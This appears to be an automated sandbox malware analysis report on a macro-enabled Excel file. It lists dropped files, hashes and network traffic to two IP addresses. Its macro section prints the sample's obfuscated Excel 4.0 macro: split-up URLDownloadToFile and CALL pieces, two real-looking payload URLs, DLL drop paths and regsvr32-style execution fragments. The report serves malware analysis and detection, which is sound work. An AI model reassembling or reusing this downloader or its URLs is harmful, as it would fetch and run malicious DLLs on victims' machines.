                    viru.xlsGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                    Category:dropped
                    Size (bytes):61020
                    Entropy (8bit):7.994886945086499
                    Encrypted:true
                    SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                    MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                    SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                    SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                    SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                    Malicious:false
                    Reputation:low
                    Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):3.139205445116624
                    Encrypted:false
                    SSDEEP:6:kKnqdoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:/G5kPlE99SNxAhUe0et
                    MD5:64F47B9C43BAE5277D277962EBE6B766
                    SHA1:5FC06F8F587C2B0990F7B86A81468D4553E1941E
                    SHA-256:E101892B3DC24393E9D0DE69BA0BE4F15F148FE885DA47FC14D89137821DD338
                    SHA-512:A5E5D85077EE4466844493A8464E50D91D549C78E2BBCF3DC9E15679A048A8532A82750326BAB0AF5846026DA93D992ADE5693957C32C22CAA8BBC7291DE6A4B
                    Malicious:false
                    Reputation:low
                    Preview: p...... ........\.I..g..(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):2.978677724097254
                    Encrypted:false
                    SSDEEP:3:kkFklUPCFltfllXlE/2S+HDHllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yR5B:kKPP6q+HDXliBAIdQZV7QvB
                    MD5:BD01DD8813FECD8323BA8C64391FDDBD
                    SHA1:63B8A0DB9C7621EE03A77EA0922C924A081DD293
                    SHA-256:E1E0D1415E227658E1D5D35FAD6D9E6398335D90C30916168D45DA2814B40705
                    SHA-512:F22BAEF01A731A9F90B70A8AA76D5C22961B913D29A1A31BD798028051B0D560679D0057E5EF1D5EEADF5F8383D3D2E6657F813D2AA7098417C8A6AEA0027BC1
                    Malicious:false
                    Reputation:low
                    Preview: p...... ....`...t....g..(....................................................... ........S`..b......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.c.4.d.2.e.5.9.c.f.b.8.0."...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA3B3626.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1133 x 589, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):75711
                    Entropy (8bit):7.915372969602997
                    Encrypted:false
                    SSDEEP:1536:gxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncT:7br0o45GUgHhX8jC9yST
                    MD5:8296338A43942E3107802E3062AC1270
                    SHA1:46E67A586ED8A961AF7FD03140547C1CB2BAC227
                    SHA-256:BE5F61F2AE8E4C9F9ADBCE5EC33D4C01A331734FFC5818AA8E45CF60456C5ABD
                    SHA-512:C2179050A009C990CBFE6EA45E44AA6307AAC938E3EA523D31713F657E09131B07ACEBB31FC353C5A23E7D6323C4EC01736CFF092ACA1D49B58E71A07F1171AD
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR...m...M......p......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......g......q.|.....<...'r....-^..c.If.,ffX1K.[....Z....V.LO5L..J+...z.]]u..>.==.......................Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t......j.7ZP...:...0S....z5T........).WU=j.*.$H.B.P.)l.6Q..'.l..7..k..J.o..._....6..{C...r.|2W.[a...m.BI.?...5......D....4;B...@b.HiP.jfj}@.S9..E.*J...O..BA5.e:...q!.SP....w....(..._.,..I.|a.7+>.........A#......3v..37......w(..j...C.R..H3.f.Q....0....h~...)aM..).vQ.1..+J@Q.....Oa+...!5.e.b...V..|..d../.......vC..&..=9...n.....^6-.tRj...O..{j.e.N....o..~..^.......#!...T...C.#.>.E,[.,......E....h~B.Y./....(2.......(...`....~w#.%..R..{........N.Z....k]8>..dW..^s....U...9...W.e...]...W...i.{u.>.s.,L.>1..)....f..b..Z.nai$.Q.."...W2.......Q...G...z....Ea......
                    C:\Users\user\AppData\Local\Temp\A8FE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):93170
                    Entropy (8bit):7.834723143895331
                    Encrypted:false
                    SSDEEP:1536:o+xJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5nchya2/WV1AWae:o5br0o45GUgHhX8jC9ySosV1AWae
                    MD5:8B497571E546A76BA893845F6A02FBE6
                    SHA1:39CB9CB427D51BFD0FD00583697C7DB2EABD5DE0
                    SHA-256:90609936B034B48E247760523F47BC87F9E2977E687B5F16CA67FFA8ED16A57A
                    SHA-512:A3756B37F91E4220281D3711A95FBB433439F5CF42751E652DAC8D9FDEF9A862512088AB93FB1001085870C1F2D824D6BDCD29DE75597BFD2145AFFCFD3B28DE
                    Malicious:false
                    Reputation:low
                    Preview: .Mn.0....z...B...AQX.M.m.....D.".....V..p,.q...y..#...r....jgkvVMX.V:.mS..?./..(...Y....]....=`A..k...r...N`.<X.Y..H...^.h..O&.\:...2&.6.~...3..Z..M&smY.m.^B.Lxo......V.@J.Xh.....+..... v..A.1.@.T.2...m...].9=.....N.@....E.R...?.Y/....>.q.h..VP\.......+..\X.[V.E......`..X.....s.4&.}...)G"........K.d.#.8.Oyd.zCh..l.!E=.....".-nL.'.}.a..q.....mq....i......H.....6.#.9f?...[.@.D....'.\{ ...CJ.......:.Fx..G...w..M......a....-.:.......O@......c........PK..........!.!=J.............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\Cab2A1.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                    Category:dropped
                    Size (bytes):61020
                    Entropy (8bit):7.994886945086499
                    Encrypted:true
                    SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                    MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                    SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                    SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                    SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                    Malicious:false
                    Reputation:low
                    Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                    C:\Users\user\AppData\Local\Temp\Tar2A2.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):158974
                    Entropy (8bit):6.311775051607851
                    Encrypted:false
                    SSDEEP:1536:ilqXley2pR737/99UF210gNucQodv+1//dMrYJntYyjCQx7s2t6OGP:iQXipR7O/gNuc/v+lXjCQ7sO0
                    MD5:E4731F8A3E7352DBA44EC7D3DD15BAEA
                    SHA1:D5CA0025FBD356DEB8EDE35001F93039625562A5
                    SHA-256:6C78EF77ACEF978321CCD30EE126FB7D30285BC186DDBDBE8B3E8F6E69D01353
                    SHA-512:E68BA11A73E28404A274F0EE4ECC97A8BEFEDB91A20BDC5B00C72AE8928DD63924E351BE8A88E40960D54CE07E21EA21710DB0DFA00A5558C4264490E27B6988
                    Malicious:false
                    Preview: 0..l...*.H.........l.0..l....1.0...`.H.e......0..\...+.....7.....\.0..\.0...+.....7........_.T.....210611210413Z0...+......0..\.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jun 23 03:09:49 2021, atime=Wed Jun 23 03:09:49 2021, length=12288, window=hide
                    Category:dropped
                    Size (bytes):867
                    Entropy (8bit):4.480231631115749
                    Encrypted:false
                    SSDEEP:12:85QxYLCLgXg/XAlCPCHaXgzB8IB/hhxkfX+WnicvbSubDtZ3YilMMEpxRljK1TdK:85jU/XTwz6IThuYepDv3qgrNru/
                    MD5:380B060C6F20226A6B8100F1B331361E
                    SHA1:ACA823307DC3D68CC49FB01AE11007AAF04AECAA
                    SHA-256:E99E64441AA1B276E00F69BD1EC276B050255D6BD643D256B900A2F5A3E473CC
                    SHA-512:BBD1DAE8FF75E159108867FA44CD0DD9225E4584DF95B43F7DA7AD561EDA50EFBC8D423CC4A6EA5CB98CAC1CD2713818E7EE538426B824C31A0C20AB4F3BC1F6
                    Malicious:false
                    Preview: L..................F...........7G......g......g...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R9!..Desktop.d......QK.X.R9!*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\idea-22543577.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Jun 23 03:09:49 2021, atime=Wed Jun 23 03:09:49 2021, length=93170, window=hide
                    Category:dropped
                    Size (bytes):2068
                    Entropy (8bit):4.548028650368087
                    Encrypted:false
                    SSDEEP:48:8B/XT3IkD+qngYenKgQh2B/XT3IkD+qngYenKgQ/:8B/XLIkD+aQKgQh2B/XLIkD+aQKgQ/
                    MD5:BDA1647BFDEA0D79EC3F0B1A959CECE5
                    SHA1:0D757F2C6F2C1673E45DA8C326A7FE6800DCADDA
                    SHA-256:3CDD8EC7A1B662611CF4A3FE49A53CB5FBF5C67E4191E99C44A334493125B2BD
                    SHA-512:4B46EA26B9553201842A2CEE6C50B754B9E850A070D82C885A73F8EF994F5B2CCD8F586EB5B0288266F701DE8B78FBD928CEDCD082A1C9711DF5B2081F61FF8D
                    Malicious:false
                    Preview: L..................F.... ....i..{..T...g......g...k...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2..l...R5! .IDEA-2~1.XLS..R.......Q.y.Q.y*...8.....................i.d.e.a.-.2.2.5.4.3.5.7.7...x.l.s.m.......|...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\idea-22543577.xlsm.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.d.e.a.-.2.2.5.4.3.5.7.7...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9F.C...........[D_
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):94
                    Entropy (8bit):4.621739484560059
                    Encrypted:false
                    SSDEEP:3:oyBVomxWHzXdUlUBhXXdUlmxWHzXdUlv:dj07bxy7E
                    MD5:E7873154CD23EE19AAA8800DC776A9B5
                    SHA1:BB75A07FBBC9BE7C5F38BB058ED8198336C4F73C
                    SHA-256:6E67DB062BE87713F064EF905334EB421CC07ABB115DD7975323EF1EDBAD4F13
                    SHA-512:8844B76DFF4AF8A235E5B791ADD65A951FEF222C64450AC98D2F3C94F7B08791A1DC64F5DFECC90EE228EF82BB0D0918E6AE77E9E836D8541FD0F4934026D45C
                    Malicious:false
                    Preview: Desktop.LNK=0..[misc]..idea-22543577.LNK=0..idea-22543577.LNK=0..[misc]..idea-22543577.LNK=0..
                    C:\Users\user\Desktop\69FE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):93170
                    Entropy (8bit):7.834723143895331
                    Encrypted:false
                    SSDEEP:1536:o+xJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5nchya2/WV1AWae:o5br0o45GUgHhX8jC9ySosV1AWae
                    MD5:8B497571E546A76BA893845F6A02FBE6
                    SHA1:39CB9CB427D51BFD0FD00583697C7DB2EABD5DE0
                    SHA-256:90609936B034B48E247760523F47BC87F9E2977E687B5F16CA67FFA8ED16A57A
                    SHA-512:A3756B37F91E4220281D3711A95FBB433439F5CF42751E652DAC8D9FDEF9A862512088AB93FB1001085870C1F2D824D6BDCD29DE75597BFD2145AFFCFD3B28DE
                    Malicious:false
                    Preview: .Mn.0....z...B...AQX.M.m.....D.".....V..p,.q...y..#...r....jgkvVMX.V:.mS..?./..(...Y....]....=`A..k...r...N`.<X.Y..H...^.h..O&.\:...2&.6.~...3..Z..M&smY.m.^B.Lxo......V.@J.Xh.....+..... v..A.1.@.T.2...m...].9=.....N.@....E.R...?.Y/....>.q.h..VP\.......+..\X.[V.E......`..X.....s.4&.}...)G"........K.d.#.8.Oyd.zCh..l.!E=.....".-nL.'.}.a..q.....mq....i......H.....6.#.9f?...[.@.D....'.\{ ...CJ.......:.Fx..G...w..M......a....-.:.......O@......c........PK..........!.!=J.............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\Desktop\~$idea-22543577.xlsm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):330
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                    Malicious:true
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.835191332560826
                    TrID:
                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                    • ZIP compressed archive (8000/1) 16.67%
                    File name:idea-22543577.xlsm
                    File size:93205
                    MD5:690a255b0f1b59b3421800bab8b41c10
                    SHA1:1036eaadc0201b50d3d005ad05e208888021b945
                    SHA256:2aba85eff52ce4b7d41b651baec98fea810a3307dc2b90bebf1c68131018cb0f
                    SHA512:a124c5e4e8cdacc52e84ab89e92f83cbf535b3757271fde02bdb8b9b254c10f1bc2a05e09ed2dc9f3b1f605f698da6970048ea4fc187375c860b745cb551f8d1
                    SSDEEP:1536:CaxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncEya2/dLBT0y:Clbr0o45GUgHhX8jC9ySXDLB/
                    File Content Preview:PK..........!.!=J.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4bcbcac

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "idea-22543577.xlsm"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    "=FORMULA.FILL(Sheet1!AQ130&Sheet1!AQ131&Sheet1!AQ132,Sheet1!AQ148)""=FORMULA.FILL(Sheet1!AQ114&Sheet1!AQ115&Sheet1!AQ116&Sheet1!AQ117&Sheet1!AQ118,Sheet1!AQ149)=Sheet2!AG2()"
                    "=FORMULA.FILL(Sheet1!AS135&Sheet1!AS136&Sheet1!AS137&Sheet1!AS138,Sheet1!AQ151)=Sheet1!AO131()"
                    ,,,,,,,,,,"=""..\wail1.dll""",,,,"=""..\wail2.dll""",,,,,,,,"=""https://senderoalcielo.com/0wq1jKHt/leef.html""",,,,"=""https://theottomandoner.com/gYiFGeXMa9/leef.html""",,,,,,,,,,,,,,,,,JJ,,,URLDow,CC,,,nload,BB,,,To,,,,Fil,,,,"=RIGHT(""rsthYFGIPUYiugeA"",2)",,,,,,,,,,,,,,,,=,=,,,,CALL,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""URL""",,,,M,,,,"=RIGHT(""ijkmzfviuhjdfbvon"",2)",,"=FORMULA.FILL(AQ122&AQ151&before.3.102.40.sheet!AQ154&before.3.102.40.sheet!AQ105&before.3.102.40.sheet!AR135,before.3.102.40.sheet!AO150)",,,,"=FORMULA.FILL(AQ122&AQ151&before.3.102.40.sheet!AQ154&before.3.102.40.sheet!AQ106&before.3.102.40.sheet!AR135,before.3.102.40.sheet!AO151)",,0,,,,,""")",E,,"(""","(""",X,,r,"""",E,,e,&,C,,g,),,,s,",",,,vr,,,,3,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,
                    "=FORMULA.FILL(Sheet1!AR113&Sheet1!AR114&Sheet1!AR115,Sheet1!AQ150)""=FORMULA.FILL(Sheet1!AR122&Sheet1!AR123&Sheet1!AR136&Sheet1!AQ148&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ149&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ150&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ108&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ105&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR142&Sheet1!AR139,Sheet1!AO148)=Sheet4!AI4()"
                    "=FORMULA.FILL(Sheet1!AQ136&Sheet1!AQ137&Sheet1!AQ138&Sheet1!AQ139&Sheet1!AQ140&Sheet1!AQ141&Sheet1!AQ142&""2 "",Sheet1!AQ154)=Sheet7!AR6()"
                    "=FORMULA.FILL(Sheet1!AR122&Sheet1!AR123&Sheet1!AR136&Sheet1!AQ148&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ149&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ150&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ109&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ106&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR142&Sheet1!AR139,Sheet1!AO149)=Sheet5!AM2()"

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 22, 2021 21:09:47.298099995 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.462121964 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.462224007 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.471760035 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.635941029 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.636574030 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.636603117 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.636624098 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.636637926 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.636678934 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.636713028 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.636717081 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.646414042 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.646538973 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.680119038 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:47.849862099 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:47.849997997 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:49.481120110 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:49.686026096 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:49.922653913 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:49.922676086 CEST44349165108.167.165.249192.168.2.22
                    Jun 22, 2021 21:09:49.922846079 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:49.923798084 CEST49165443192.168.2.22108.167.165.249
                    Jun 22, 2021 21:09:50.027775049 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.082907915 CEST443491685.100.155.169192.168.2.22
                    Jun 22, 2021 21:09:50.082998037 CEST49168443192.168.2.225.100.155.169
                    Jun 22, 2021 21:09:50.083619118 CEST49168443192.168.2.225.100.155.169
